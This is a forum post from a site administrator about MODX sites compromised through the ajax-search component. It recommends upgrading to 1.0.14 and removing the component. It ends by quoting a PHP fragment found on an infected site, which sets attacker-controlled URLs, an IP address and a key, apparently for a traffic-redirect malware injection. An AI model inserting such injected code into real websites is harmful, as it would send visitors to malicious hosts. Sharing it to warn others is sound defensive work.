That is terrible news.
Just after I read your post, modness, a friend called me saying that her hosting found it on her site and she should change all her passwords including ftp. I found all of the tell-tale signs, that snippet.ditto2.php. I am going to upgrade her to 1.0.14 as soon as I get a chance.
After spending a lot of time upgrading a lot of sites to 1.0.14, I am going back through it all to make sure that I also delete all traces of ajax-search.
I hope that the vulnerability is limited to ajax-search.
If it is still happening in 1.0.14 I think it should be considered to NOT have it as a default in the vanilla install of modx.
Here was a piece of code I found in one of the files made, just when I am getting told that the russians have millions of peoples passwords:
<?$tds="http://spoilt.ptds2.ru/TDS.post.php";$tdsip="194.28.70.132";$lin="http://g0od.ru/uz/index.php";$esdid="viagh";$key="bjijtyuumyummktyt865ue56yg56kmyjnkj67ti";?><?//BREACK//?>